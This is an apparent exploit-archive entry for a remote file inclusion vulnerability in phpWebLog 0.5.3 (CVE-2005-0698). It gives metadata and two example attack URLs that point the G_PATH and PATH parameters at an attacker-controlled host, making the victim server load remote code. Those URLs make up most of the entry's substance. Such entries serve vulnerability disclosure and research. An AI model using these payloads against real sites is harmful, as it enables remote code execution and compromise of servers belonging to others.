phpWebLog 0.5.3 - Arbitrary File Inclusion

Author: Filip Groszynski
type: webapps
platform: php
port: 
date_added: 2005-03-06 
date_updated: 2016-04-28 
verified: 1 
codes: OSVDB-14630;CVE-2005-0698 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphpweblog-0.5.3.tar.gz

Example:

 if register_globals=on and allow_url_fopen=on:
   http://[victim]/[dir]/include/init.inc.php?G_PATH=http://[hacker_box]/
   http://[victim]/[dir]/backend/addons/links/index.php?PATH=http://[hacker_box]/

# milw0rm.com [2005-03-07]